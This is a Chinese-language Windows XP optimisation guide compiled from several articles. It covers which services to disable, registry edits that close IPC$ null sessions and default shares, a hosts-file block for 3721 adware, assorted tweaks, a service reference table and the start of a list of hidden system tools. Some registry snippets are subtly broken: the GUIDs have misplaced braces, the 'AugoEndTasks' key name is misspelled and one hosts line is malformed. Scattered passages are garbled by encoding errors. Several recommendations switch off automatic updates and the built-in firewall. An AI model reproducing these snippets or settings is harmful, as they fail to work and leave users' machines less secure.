
    40)SSDP Discovery service我用不到这个

    41)system event notification如果是服务器肯定要记录的

    42)system restore service系统还原服务

    43)task scheduler windows计划服务

    44)Telephony拨号服务，我不拨号还不行吗？

    45)telnet

    46)terminal services终端服务

    47)uninterruptible power supply UPS，我没有呀

    48)universal plug and play device host太先进了点，用不到

    49)upload manager关了也能传输文件的

    50)volume shadow copy又是备份，晕

    51)webclient没用过

    52)Windows Installer MSI服务，我一直关着。

    53)windows image acquisition (WIA)数码设备用的

    54)windows management instrumentation driver extensions关了

    55)windows time时间服务

    56)wireless zero configuration无线网络，偶用不到的

    57)WMI perfromance adapter关！

    这里面的一些服务是刚开始就是关的，但我忘了，所以只好把现在系统中关闭的服务基本都列了出来。你根据自己的情况酌情处理吧。

    三、我安全吗

    多了不谈，基本的共享还是得关的：

    修改注册表为以下两个样式：

    去除共享

    防范IPC默认共享

    Windows XP在默认安装后允许任何用户通过空用户连接(IPC＄)得到系统所有账号和共享列表，这本来是为了方便局域网用户共享资源和文件的，但是任何一个远程用户都可以利用这个空的连接得到你的用户列表。黑客就利用这项功能，查找系统的用户列表，并使用一些字典工具，对系统进行攻击。这就是网上较流行的IPC攻击。

    要防范IPC攻击就应该从系统的默认配置下手，可以通过修改注册表弥补漏洞：

    第一步：将HKEY_LOCAL _MACHINE\SYSTEM\CurrentControlSet\Control\LSA的RestrictAnonymous项设置为“1”，就能禁止空用户连接。

    第二步：打开注册表的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet \Services\ LanmanServer\Parameters项。

    对于服务器，添加键值“AutoShareServer”，类型为“REG_DWORD”，值为“0”。

    对于客户机，添加键值“AutoShareWks”，类型为“REG_DWORD”，值为“0”。

    ——————————————————————

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]

    "restrictanonymous"=dword:00000001

    ——————————————————————

    或者将上面两个保存成个.REG文件，然后双击导入就可以了。

    顺便把不要脸的的3721也屏蔽，在hosts文件中加入：

    127.0.0.1 cnsmin.3721.com

    127.0.0www.3721.net

    四、其他技巧

    1、给鼠标右键增加个复制到.../移动到...功能

    —————————————————————

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers]

      [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Copy To]

    @="C2FBB630-2971-11D1-A18C-00C04FD75D13{}"

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Move To]

    @="C2FBB631-2971-11D1-A18C-00C04FD75D13{}"

    ————————————————————————

    将上面内容保存成add.reg文件，然后双击导入就可以了。

    2、关了错误报告，KAO！这东西搞得我像个微软免费的测试员似的：点击控制面板---->系统---->高级---->右下角--->错误报告---->禁用错误汇报——>确定！

    3、取消分组显示：右键单击任务栏的空白区域，在弹出的菜单中选择“属性”，在弹出的窗口中，取消“分组相似任务栏按钮”前面的对钩，确定就可以了。

    4、找回经典的登录窗口，WinXP默认的登录界面虽然漂亮，但如果你想用一个列表中没有的用户登录，你会发现无从下手，改回经典窗口的方法是：点击“开始”→“控制面板”→“用户账户”→“更改用户登录或注销的方式”→把“使用欢迎屏幕”前面的对钩取消，最后点“应用选项”就OK啦。

    5、将自己最常用的输入法设置一个快捷键：点击“开始”→“控制面板”→“区域和语言选项”→在弹出的窗口中选择“语言”→“详细信息”→“键设置”在弹出的窗口中找到自己用的输入法，点“更改按键顺序”→在这里选一个快捷键就可以了。

    6、关闭计算机时自动结束不响应的任务，注册表：HKEY_CURRENT_USER\Control Panel\Desktop中的“AugoEndTasks”的键值改为“1”

    7、关闭自动更新：右键单击“我的电脑”，点击属性，点击“自动更新”，在“通知设置”一栏选择“关闭自动更新。我将手动更新计算机”一项。

    8、减少开机磁盘扫描等待时间，开始→运行，键入“chkntfs/t:0”

    然后连接到ms站点顺便升级一次就算优化基本完成，对于XP而言，可以采用许多内部命令来看看优化情况，比如tasklist.exe /svc可以查看系统服务实际使用情况。

    优化一个系统，挺麻烦的。所以我们把他保存起来，我们用Ghost生成.GHO文件，这样就可以拿给别人炫耀一下啦，在Ghost之前先要作一个事情，清除系统硬件、注册等信息，否则克隆到不同的机子上将无法启动，在Winxp安装盘上找Deploy.cab中的sysprep.exe文件。

    执行sysprep.exe，选择“重新封装”，下面的标记中可以选择“已提前激活”，还可以选择封装完成后是关机还是重新启动。封装完成后，我们再用带有Ghost的系统盘启动，用Ghost来生成备份.GHO镜像，备份完成！

    在执行封装后，重新开机，XP会让我们输入序列号，文中开头所提到的换序列号的办法就是这样换。


WINXP中系统服务的详细说明和可被禁用的服务对照表

《一键清理系统垃圾》

WINXP中系统服务的详细说明和可被禁用的服务对照表

Windows XP 服务的最详细说明
Alerter
微软： 通知选取的使用者及计算机系统管理警示。如果停止这个服务，使用系统管理警示的程序将不会收到通知。如果停用这个服务，所有依存于它的服务将无法启动。
补充： 一般家用计算机根本不需要传送或接收计算机系统管理来的警示(Administrative Alerts)，除非你的计算机用在局域网络上
依存： Workstation
建议： 已停用
Application Layer Gateway Service
微软： 提供因特网联机共享和因特网联机防火墙的第三方通讯协议插件的支持
补充： 如果你不使用因特网联机共享 (ICS) 提供多台计算机的因特网存取和因特网联机防火墙 (ICF) 软件你可以关掉
依存： Internt Connection Firewall (ICF) / Internet Connection Sharing (ICS)
建议： 已停用

Application Management (应用程序管理)
微软： 提供指派、发行、以及移除的软件安装服务。
补充： 如上说的软件安装变更的服务
建议： 手动

Automatic Updates
微软： 启用重要 Windows 更新的下载及安装。如果停用此服务，可以手动的从 Windows Update 网站上更新操作系统。
补充： 允许 Windows 于背景自动联机之下，到 Microsoft Servers 自动检查和下载更新修补程序
建议： 已停用

Background Intelligent Transfer Service
微软： 使用闲置的网络频宽来传输数据。
补充： 经由 Via HTTP1.1 在背景传输资料的?#124;西，例如 Windows Update 就是以此为工作之一
依存： Remote Procedure Call (RPC) 和 Workstation
建议： 已停用

ClipBook (剪贴簿)
微软： 启用剪贴簿检视器以储存信息并与远程计算机共享。如果这个服务被停止，剪贴簿检视器将无法与远程计算机共享信息。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 把剪贴簿内的信息和其它台计算机分享，一般家用计算机根本用不到
依存： Network DDE
建议： 已停用

COM+ Event System (COM+ 事件系统)
微软： 支持「系统事件通知服务 (SENS)」，它可让事件自动分散到订阅的 COM 组件。如果服务被停止，SENS 会关闭，并无法提供登入及注销通知。如果此服务被停用，任何明显依存它的服务都无法启动。
补充： 有些程序可能用到 COM+ 组件，像 BootVis 的 optimize system 应用，如事件检视器内显示的 DCOM 没有启用
依存： Remote Procedure Call (RPC) 和 System Event Notification
建议： 手动

COM+ System Application
微软： 管理 COM+ 组件的设定及追踪。如果停止此服务，大部分的 COM+ 组件将无法适当?#092;作。如果此服务被停用，任何明确依存它的服务将无法启动。
补充： 如果 COM+ Event System 是一台车，那么 COM+ System Application 就是司机，如事件检视器内显示的 DCOM 没有启用
依存： Remote Procedure Call (RPC)
建议： 手动

Computer Browser (计算机浏览器)
微软： 维护网络上更新的计算机清单，并将这个清单提供给做为浏览器的计算机。如果停止这个服务，这个清单将不会被更新或维护。如果停用这个服务，所有依存于它的服务将无法启动。
补充： 一般家庭用计算机不需要，除非你的计算机应用在区网之上，不过在大型的区网上有必要开这个拖慢速度吗？
依存： Server 和 Workstation
建议： 已停用

Cryptographic Services
微软： 提供三个管理服务: 确认 Windows 档案签章的 [类别目录数据库服务]; 从这个计算机新增及移除受信任根凭证授权凭证的 [受保护的根目录服务]; 以及协助注册这个计算机以取得凭证的 [金钥服务]。如果这个服务被停止，这些管理服务将无法正确工作。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 简单的说就是 Windows Hardware Quality Lab (WHQL)微软的一种认证，如果你有使用 Automatic Updates ，那你可能需要这个
依存： Remote Procedure Call (RPC)
建议： 手动

DHCP Client (DHCP 客户端)
微软： 透过登录及更新 IP 地址和 DNS 名称来管理网络设定。
补充： 使用 DSL/Cable 、ICS 和 IPSEC 的人都需要这个来指定动态 IP
依存： AFD 网络支持环境、NetBT、SYMTDI、TCP/IP Protocol Driver 和 NetBios over TCP/IP
建议： 手动

Distributed Link Tracking Client (分布式连结追踪客户端)
微软： 维护计算机中或网络网域不同计算机中 NTFS 档案间的连结。
补充： 维护区网内不同计算机之间的档案连结
依存： Remote Procedure Call (RPC)
建议： 已停用

Distributed Transaction Coordinator (分布式交易协调器)
微软： 协调跨越多个资源管理员的交易，比如数据库、讯息队列及档案系统。如果此服务被停止，这些交易将不会发生。如果服务被停用，任何明显依存它的服务将无法启动。
补充： 如上所说的，一般家庭用计算机用不太到，除非你启用的 Message Queuing
依存： Remote Procedure Call (RPC) 和 Security Accounts Manager
建议： 已停用

DNS Client (DNS 客户端)
微软： 解析并快取这台计算机的网域名称系统 (DNS) 名称。如果停止这个服务，这台计算机将无法解析 DNS 名称并寻找 Active Directory 网域控制站的位置。如果停用这个服务，所有依存于它的服务将无法启动。
补充： 如上所说的，另外 IPSEC 需要用到
依存： TCP/IP Protocol Driver
建议： 手动

Error Reporting Service
微软： 允许对执行于非标准环境中的服务和应用程序的错误报告。
补充： 微软的应用程序错误报告
依存： Remote Procedure Call (RPC)
建议： 已停用

Event Log (事件记录文件)
微软： 启用 Windows 为主的程序和组件所发出的事件讯息可以在事件检视器中检视。这个服务不能被停止。
补充： 允许事件讯息显示在事件检视器之上
依存： Windows Management Instrumentation
建议： 自动

Fast User Switching Compatibility
微软： 在多使用者环境下提供应用程序管理。
补充： 另外像是注销画面中的切换使用者功能
依存： Terminal Services
建议： 手动

Help and Support
微软： 让说明及支持中心能够在这台计算机上执行。如果这个服务停止，将无法使用说明及支持中心。如果这个服务被停用，它的所有依存服务将无法启动。
补充： 如果不使用就关了吧
依存： Remote Procedure Call (RPC)
建议： 已停用

Human Interface Device Access
微软： 启用对人性化接口装置 (HID) 的通用输入存取，HID 装置启动并维护对这个键盘、远程控制、以及其它多媒体装置上事先定义的快捷纽的使用。如果这个服务被停止，这个服务控制的快捷纽将不再起作用。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 如上所提到的
依存： Remote Procedure Call (RPC)
建议： 已停用

IMAPI CD-Burning COM Service
微软： 使用 Image Mastering Applications Programming Interface (IMAPI) 来管理光盘录制。如果这个服务被停止，这个计算机将无法录制光盘。如果这个服务被停用，任何明确地依赖它的服务将无法启动。
补充： XP 整合的 CD-R 和 CD-RW 光驱上拖放的烧录功能，可惜比不上烧录软件，关掉还可以加快 Nero 的开启速度
建议： 已停用

Indexing Service (索引服务)
微软： 本机和远程计算机的索引内容和档案属性; 透过弹性的查询语言提供快速档案存取。
补充： 简单的说可以让你加快搜查速度，不过我想应该很少人和远程计算机作搜寻吧
依存： Remote Procedure Call (RPC)
建议： 已停用

Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
微软： 为您的家用网络或小型办公室网络提供网络地址转译、寻址及名称解析服务和/或防止干扰的服务。
补充： 如果你不使用因特网联机共享(ICS)或是 XP 内含的因特网联机防火墙(ICF)你可以关掉
依存： Application Layer Gateway Service、Network Connections、Network Location Awareness(NLA)、Remote Access Connection Manager
建议： 已停用

IPSEC Services (IP 安全性服务)
微软： 管理 IP 安全性原则并启动 ISAKMP/Oakley (IKE) 及 IP 安全性驱动程序。
补充： 协助保护经由网络传送的数据。IPSec 为一重要环节，为虚拟私人网络 (VPN) 中提供安全性，而 VPN 允许组织经由因特网安全地传输数据。在某些网域上也许需要，但是一般使用者大部分是不太需要的
依存： IPSEC driver、Remote Procedure Call (RPC)、TCP/IP Protocol Driver
建议： 手动

Logical Disk Manager (逻辑磁盘管理员)
微软： 侦测及监视新硬盘磁盘，以及传送磁盘区信息到逻辑磁盘管理系统管理服务以供设定。如果这个服务被停止，动态磁盘状态和设定信息可能会过时。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 磁盘管理员用来动态管理磁盘，如显示磁盘可用空间等和使用 Microsoft Management Console(MMC)主控台的功能
依存： Plug and Play、Remote Procedure Call (RPC)、Logical Disk Manager Administrative Service
建议： 自动

Logical Disk Manager Administrative Service (逻辑磁盘管理员系统管理服务)
微软： 设定硬盘磁盘及磁盘区，服务只执行设定程序然后就停止。
补充： 使用 Microsoft Management Console(MMC)主控台的功能时才用到
依存： Plug and Play、Remote Procedure Call (RPC)、Logical Disk Manager
建议： 手动

Messenger (信差)
微软： 在客户端及服务器之间传输网络传送及 [Alerter] 服务讯息。这个服务与 Windows Messenger 无关。如果停止这个服务，Alerter 讯息将不会被传输。如果停用这个服务，所有依存于它的服务将无法启动。
补充： 允许网络之间互相传送提示讯息的功能，如 net send 功能，如不想被骚扰话可关了
依存： NetBIOS Interface、Plug and Play、Remote Procedure Call (RPC)、Workstation
建议： 已停用

MS Software Shadow Copy Provider
微软： 管理磁盘区阴影复制服务所取得的以软件为主的磁盘区阴影复制。如果停止这个服务，就无法管理以软件为主的磁盘区阴影复制。如果停用这个服务，任何明确依存于它的服务将无法启动。
补充： 如上所说的，用来备份的?#124;西，如 MS Backup 程序就需要这个服务
依存： Remote Procedure Call (RPC)
建议： 已停用

Net Logon
微软： 支持网域上计算机的账户登入事件的 pass-through 验证。
补充： 一般家用计算机不太可能去用到登入网域审查这个服务
依存： Workstation
建议： 已停用

NetMeeting Remote Desktop Sharing (NetMeeting 远程桌面共享)
微软： 让经过授权的使用者可以使用 NetMeeting 透过公司近端内部网络，由远程访问这部计算机。如果这项服务停止的话，远程桌面共享功能将无法使用。如果服务停用的话，任何依赖它的服务将无法启动。
补充： 如上说的，让使用者可以将计算机的控制权分享予网络上或因特网上的其它使用者，如果你重视安全性不想多开后门，就关了吧
建议： 已停用

Network Connections (网络联机)
微软： 管理在网络和拨号联机数据夹中的对象，您可以在此数据夹中检视局域网络和远程联机。
补充： 控制你的网络联机
依存： Remote Procedure Call (RPC)、Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
建议： 手动

Network DDE (网络 DDE)
微软： 为动态数据交换 (DDE) 对在相同或不同计算机上执行的程序提供网络传输和安全性。如果这个服务被停止，DDE 传输和安全性将无法使用。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 一般人好像用不到
依存： Network DDE DSDM、ClipBook
建议： 已停用

Network DDE DSDM (网络 DDE DSDM)
微软： 讯息动态数据交换 (DDE) 网络共享。如果这个服务被停止，DDE 网络共享将无法使用。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 一般人好像用不到
依存： Network DDE
建议： 已停用

Network Location Awareness (NLA)
微软： 收集并存放网络设定和位置信息，并且在这个信息变更时通知应用程序。
补充： 如果不使用 ICF 和 ICS 可以关了它
依存： AFD网络支持环境、TCP/IP Procotol Driver、Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
建议： 已停用

NT LM Security Support Provider (NTLM 安全性支持提供者)
微软： 为没有使用命名管道传输的远程过程调用 (RPC) 程序提供安全性。
补充： 如果不使用 Message Queuing 或是 Telnet Server 那就关了它
依存： Telnet
建议： 已停用

Performance Logs and Alerts (效能记录文件及警示)
微软： 基于事先设定的排程参数，从本机或远程计算机收集效能数据，然后将数据写入记录或?#124;发警讯。如果这个服务被停止，将不会收集效能信息。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 没什么价值的服务
建议： 已停用

Plug and Play (随寮从?
微软： 启用计算机以使用者没有或很少的输入来识别及适应硬件变更，停止或停用这个服务将导致系统不稳定。
补充： 顾名思义就是 PNP 环境
依存： Logical Disk Manager、Logical Disk Manager Administrative Service、Messenger、Smart Card、Telephony、Windows Audio
建议： 自动

Portable Media Serial Number
微软： Retrieves the serial number of any portable music player connected to your computer
补充： 透过联机计算机重新取得任何音乐拨放序号？没什么价值的服务
建议： 已停用

Print Spooler (打印多任务缓冲处理器)
微软： 将档案加载内存中以待稍后打印。
补充： 如果没有打印机，可以关了
依存： Remote Procedure Call (RPC)
建议： 已停用

Protected Storage (受保护的存放装置)
微软： 提供受保护的存放区，来储存私密金钥这类敏感数据，防止未授权的服务、处理、或使用者进行存取。
补充： 用来储存你计算机上密码的服务，像 Outlook、拨号程序、其它应用程序、主从架构等等
依存： Remote Procedure Call (RPC)
建议： 自动

QoS RSVP (QoS 许可控制，RSVP)
微软： 提供网络讯号及区域流量控制安装功能给可识别 QoS 的程序和控制小程序项。
补充： 用来保留 20% 频宽的服务，如果你的网络卡不支持 802.1p 或在你计算机的网域上没有 ACS server ，那么不用多说，关了它
依存： AFD网络支持环境、TCP/IP Procotol Driver、Remote Procedure Call (RPC)
建议： 已停用

Remote Access Auto Connection Manager (远程访问自动联机管理员)
微软： 当程序参照到远程 DNS 或 NetBIOS 名称或地址时，建立远程网络的联机。
补充： 有些 DSL/Cable 提供者，可能需要用此来处理登入程序
依存： Remote Access Connection Manager、Telephony
建议： 手动

Remote Access Connection Manager (远程访问联机管理员)
微软： 建立网络联机。
补充： 网络联机用
依存： Telephony、Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)、Remote Access Auto Connection Manager
建议： 手动

Remote Desktop Help Session Manager
微软： 管理并控制远程协助。如果此服务停止的话，远程协助将无法使用。停止此服务之前，请先参阅内容对话框中的 [依存性]标签。
补充： 如上说的管理和控制远程协助，如果不使用可以关了
依存： Remote Procedure Call (RPC)
建议： Disable

Remote Procedure Call (RPC) (远程过程调用，RPC)
微软： 提供结束点对应程序以及其它 RPC 服务。
补充： 一些装置都依存它，别去动它
依存： 太多了，自己去看看
建议： 自动

Remote Procedure Call (RPC) Locator (远程过程调用定位程序)
微软： 管理 RPC 名称服务数据库。
补充： 如上说的，一般计算机上很少用到，可以尝试关了
依存： Workstation
建议： Disable

Remote Registry (远程登录服务)
微软： 启用远程使用者修改这个计算机上的登录设定。如果这个服务被停止，登录只能由这个计算机上的使用者修改。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 基于安全性的理由，如果没有特别的需求，建议最好关了它，除非你需要远程协助修改你的登录设定
依存： Remote Procedure Call (RPC)
建议： 已停用

Removable Storage (卸除式存放装置)
微软： None
补充： 除非你有 Zip 磁盘驱动器或是 USB 之类可携式的硬件或是 Tape 备份装置，不然可以尝试关了
依存： Remote Procedure Call (RPC)
建议： Disable

Routing and Remote Access (路由和远程访问)
微软： 提供连到局域网络及广域网络的公司的路由服务。
补充： 如上说的，提供拨号联机到区网或是 VPN 服务，一般用户用不到
依存： Remote Procedure Call (RPC)、NetBIOSGroup
建议： 已停用

Secondary Logon
微软： 启用在其它认证下的起始程序。如果这个服务被停止，这类的登入存取将无法使用。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 允许多个使用者处理程序，执行分身等
建议： 自动

Security Accounts Manager (安全性账户管理员)
微软： 储存本机账户的安全性信息。
补充： 管理账号和群组原则(gpedit.msc)应用
依存： Remote Procedure Call (RPC)、Distributed Transaction Coordinator
建议： 自动

Server (服务器)
微软： 透过网络为这台计算机提供档案、打印、及命名管道的共享。如果停止这个服务，将无法使用这些功能。如果停用这个服务，所有依存于它的服务将无法启动。
补充： 简单的说就是档案和打印的分享，除非你有和其它计算机分享，不然就关了
依存： Computer Browser
建议： 已停用

Shell Hardware Detection
微软： 为自动播放硬件事件提供通知。
补充： 一般使用在记忆卡或是CD装置、DVD装置上
依存： Remote Procedure Call (RPC)
建议： 自动

Smart Card (智慧卡)
微软： 管理这个计算机所读取智能卡的存取。如果这个服务被停止，这个计算机将无法读取智能卡。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 如果你不使用 Smart Card ，那就可以关了
依存： Plug and Play
建议： 已停用

Smart Card Helper (智能卡协助程序)
微软： 启用对这个计算机使用的旧版非随插即用智能卡读取头的支持。如果这个服务被停止，这个计算机将不支持旧版读取头。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 如果你不使用 Smart Card ，那就可以关了
建议： 已停用

SSDP Discovery Service
微软： 在您的家用网络上启用通用随插即用装置的搜索。
补充： 如上说的，通用随插即用服务 (Universal Plug and Play, UPnP) 让计算机可以找到并使用网络上的装置，经由网络联机透过 TCP/IP 来搜索装置，像网络上的扫瞄器、数字相机或是打印机，亦即使用 UPnP 的功能，基于安全性没用到的大可关了
依存： Universal Plug and Play Device Host
建议： 已停用

System Event Notification (系统事件通知)
微软： 追踪诸如 Windows 登入、网络、和电源事件的系统事件。通知这些事件的 COM+ 事件系统订阅者。
补充： 如上所说的
依存： COM+ Event System
建议： 自动

System Restore Service
微软： 执行系统还原功能。若要停止服务，从我的计算机->内容，[系统还原] 中关闭系统还原
补充： 将计算机回复至先前的状态，不使用就关了
依存： Remote Procedure Call (RPC)
建议： 已停用

Task Scheduler (工作排程器)
微软： 让使用者能够在这个计算机上设定和排定自动的工作。如果停止这个服务，这些工作在它们排定的时间时将不会执行。如果停用这个服务，任何明确依存于它的服务将无法启动。
补充： 设定排定自动的工作，像一些定时磁盘扫瞄、病毒定时扫瞄、更新等等
依存： Remote Procedure Call (RPC)
建议： 自动

TCP/IP NetBIOS Helper (TCP/IP NetBIOS 协助程序)
微软： 启用 [NetBIOS over TCP/IP (NetBT)] 服务及 NetBIOS 名称解析的支持。
补充： 如果你的网络不使用 NetBios 或是 WINS ，你大可关闭
依存： AFD 网络支持环境、NetBt
建议： 已停用

Telephony (电话语音)
微软： 为本机计算机上及经由局域网络连接到正在执行此服务的服务器上，控制电话语音装置和 IP 为主语音联机的程序，提供电话语音 API (TAPI) 支持。
补充： 一般的拨号调制解调器或是一些 DSL/Cable 可能用到
依存： Plug and Play、Remote Procedure Call (RPC)、Remote Access Connection Manager、Remote Access Auto Connection Manager
建议： 手动

Telnet
微软： 启用一个远程使用者来登入到这台计算机和执行应用程序，以及支持各种 TCP/IP Telnet 客户端，包含以 UNIX 为基本和以 Windows 为基本的计算机。如果服务停止了，远程使用者可能无法存取应用程序。如果服务停用了，任何明确地依存于这项服务的其它服务将会启动失败。
补充： 允许远程使用者用 Telnet 登入本计算机，一般人会误解关了就无法使用BBS，这其实和BBS无关，基于安全性的理由，如果没有特别的需求，建议最好关了
依存： NT LM Security Support Provider、Remote Procedure Call (RPC)、TCP/IP Protocol Driver
建议： 已停用

Terminal Services (终端机服务)
微软： 允许多位使用者互动连接到同一部计算机、桌面的显示器及到远程计算机的应用程序。远程桌面的加强 (包含系统管理员的 RD)、快速切换使用者、远程协助和终端机服务器。
补充： 远程桌面或是远程协助的功能，不需要就关了
依存： Remote Procedure Call (RPC)、Fast User Switching Compatibility、InteractiveLogon
建议： 已停用

Themes
微软： 提供使用者经验主题管理。
补充： 很多人使用布景主题，不过如果没有使用的人，那就可以关闭
建议： 自动

Uninterruptible Power Supply (不断电供电系统)
微软： 管理连接到这台计算机的不断电电源供应 (UPS)。
补充： 不断电电源供应 (UPS)一般人有用到吗？除非你的电源供应器有具备此功能，不然就关了
建议： 已停用

Universal Plug and Play Device Host
微软： 提供主机通用随插即用装置的支持。
补充： 用来侦测安装通用随插即用服务 (Universal Plug and Play, UPnP)装置，像是数字相机或打印机
依存： SSDP Discovery Service
建议： 已停用

Volume Shadow Copy
微软： 管理及执行用于备份和其它目的的磁盘区卷影复制。如果这个服务被停止，卷影复制将无法用于备份，备份可能会失败。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 如上所说的，用来备份的?#124;西，如 MS Backup 程序就需要这个服务
依存： Remote Procedure Call (RPC)
建议： 已停用

WebClient
微软： 启用 Windows 为主的程序来建立、存取，以及修改因特网为主的档案。如果停止这个服务，这些功能将无法使用。如果停用这个服务，任何明确依存于它的服务将无法启动。
补充： 使用 WebDAV 将档案或数据夹上载到所有的 Web 服务，基于安全性的理由，你可以尝试关闭
依存： WebDav Client Redirector
建议： 淹Ｓ?

Windows Audio
微软： 管理用于 Windows 为主程序的音讯装置。如果这个服务被停止，音讯装置和效果将无法正常?#092;作。如果这个服务被停用，任何明确依存于它的服务将无法启动。
补充： 如果你没有声卡可以关了他
依存： Plug and Play、Remote Procedure Call (RPC)
建议： 自动

Windows Image Acquisition (WIA) (Windows影像取得程序)
微软： 为扫描仪和数字相机提供影像撷取服务。
补充： 如果扫描仪和数字相机内部具有支持WIA功能的话，那就可以直接看到图档，不需要其它的驱动程序，所以没有扫描仪和数字相机的使用者大可关了
依存： Remote Procedure Call (RPC)
建议： 已停用

Windows Installer (Windows 安装程序)
微软： 根据包含在 .MSI 档案内的指示来安装，修复以及移除软件。
补充： 是一个系统服务，协助使用者正确地安装、设定、追踪、升级和移除软件程序，可管理应用程序建立和安装的标准格式，并且追踪例如档案群组、登录项目及快捷方式等组件
依存： Remote Procedure Call (RPC)
建议： 手动

Windows Management Instrumentation (WMI)
微软： 提供公用接口及对象模型，以存取有关操作系统、装置、应用程序及服务的管理信息。如果这个服务已停止，大多数的 Windows 软件将无法正常?#092;作。如果这个服务已停用，所有依存于它的服务都将无法启动。
补充： 如上说的，是一种提供一个标准的基础结构来监视和管理系统资源的服务，由不得你动他
依存： Event Log、Remote Procedure Call (RPC)
建议： 自动

Windows Management Instrumentation Driver Extensions (Windows Management Instrumentation 驱动程序延伸)
微软： 提供系统管理信息给予/取自驱动程序。
补充： Windows Management Instrumentation 的延伸，提供信息用的
建议： 手动

Windows Time (Windows 时间设定)
微软： 维护在网络上所有客户端及服务器的数据及时间同步处理。如果这个服务停止，将无法进行日期及时间同步处理。如果这个服务被停用，所有依存的服务都会停止。
补充： 网络对时校准用的，没必要就关了
建议： 已停用

Wireless Zero Configuration
微软： 为 802.11 适配卡提供自动设定
补充： 自动配置无线网络装置，言下之意就是说，除非你有在使用无线网络适配卡装置，那么你才有必要使用这个网络零管理服务
依存： NDIS Usermode I/O Protocol、Remote Procedure Call (RPC)
建议： 已停用

WMI Performance Adapter
微软： 提供来自 WMIHiPerf 提供者的效能链接库信息。
补充： 如上所提
依存： Remote Procedure Call (RPC)
建议： 已停用l

Workstation (工作站)
微软： 建立并维护到远程服务器的客户端网络联机。如果停止这个服务，这些联机将无法使用。如果停用这个服务，所有依存于它的服务将无法启动。
补充： 因特网联机中所必要的一些功能
依存： Alerter、Background Intelligent Transfer Service、Computer Browser、Messenger、Net Logon、Remote Procedure Call (RPC) Locator
建议： 自动

application layer gateway service
为internet连接共享和internet连接防火墙提供第三方协议插件的支持如果你没启用internet连接共享或windows xp内置防火墙，可以禁止这个服务。
automatic updates
自动从windows update启用windows更新的下载和安装需要时，我们完全可以在windows update web网站手动进行更新。
clipbook
启用“剪贴板查看器”储存信息并与远程计算机共享
如果你没有使用windows xp的远程桌面功能，那么可以禁止该服务。
error reporting service
服务和应用程序在非标准环境下运行时允许错误报告
这个错误报告对大多数人来说是没用的，所以说我们可以禁止这项服务。
fast user switching compatibility
为在多用户下需要协助的应用程序提供管理
windows xp允许在一台电脑上进行多用户之间的快速切换，如果使用不到，完全可以禁止该服务。
imapi cd-burning com service
用imapi管理cd录制
如果你有专业的刻录软件，或者根本就没有刻录机的话，那么可以禁止该服务。
indexing service
本地和远程计算机上文件的索引内容和属性，提供文件快速访问
这项服务对个人用户没有多大用处，而启用后往往会占用很多cpu资源，所以禁止！
print spooler
将文件加载到内存中以便迟后打印
如果你没装打印机，完全可以禁用这个服务。
remote registry
使远程用户能修改此计算机上的注册表设置
这项非禁止不可，因为不但个人用户用不到，而且有些居心不良的人还可以通过这个服务把你的浏
览器或系统改得面目全非。
smart card
管理计算机对智能卡的取读访问
智能卡？你有吗？
ssdp discovery service
启动家庭网络上的upnp设备的发现
具有upnp的设备还不多，对于我们来说这个服务是没有用的，禁止吧。
terminal services
允许多位用户连接并控制一台机器，并且在远程计算机上显示桌面和应用程序
如果你用到xp的远程控制功能，那么就需要保留该服务，否则可以禁止它。
uninterruptible power supply
管理连接到计算机的不间断电源
如果你有那种可以和计算机进行数字通讯的ups电源的话，那么就需要这个服务，没有的话就禁止!


WinXP中鲜为人知的28项隐藏功能

《一键清理系统垃圾》

WinXP中鲜为人知的28项隐藏功能

Windows的很多隐藏功能，都没有直接体现在菜单或者系统的开始项中，而是直接以文件的形式存在于Windows安装目录中，今天，笔者就带大家认识一下它们吧。

  1、免费的系统教程（system32文件夹下）

    安装完Windows XP后很想马上学习并体验一下它的魅力吗？我们无需再东奔西走去找烦人的文字教材。只要选择“开始”→“ 漫游Windows XP”，就会出现界面，它将引导我们游历Windows XP的新功能。

    小提示：Windows XP中自带的教程非常形象，是图形界面的，而且制作得相当精美，微软的权威性可想而知。如果你的“开始”菜单上没有“漫游Windows XP”项目，则可以运行C:＼Windows＼System32＼tourstart.exe进入。

    2、辅助功能向导——Accwiz（system32文件夹下）

    我们知道，微软在Windows中为残疾人士提供了辅助功能，使他们也能xx作计算机。该程序可以根据用户的视觉、听力和行动来配置我们的Windows，使残疾人士能根据自身情况更好地使用Windows。

    3、字符映射表——Charmap（system32文件夹）

    是不是觉得Word的“插入符号”功能非常方便？我们在其他Windows程序中也常常要插入一些特殊符号，而一个个地找又麻烦，这时可使用“字符映射表”程序帮忙。

    通过“字符映射表”可查看选定字体中有哪些字符，选中后单击“选定”和“复制”按钮，即可把选定字符复制到Windows剪贴板中，供字处理软件粘贴使用。

    小提示：用它来复制特殊字体中的特殊符号特别有用。

    4、仓颉拼音输入法——CINTSETP(system32＼IME＼Cintlgnt文件夹下)

    微软新仓颉输入法98b的安装程序，微软把它放在简体中文版Windows XP中，但埋藏得较深。不过它很有用，安装后就会在Windows中新增一个“中文（台湾）”的仓颉输入法，利用它可以在简体中文Windows XP上通过输入繁体汉字。这对于从中国港澳台地区至内地工作的人提供了方便。

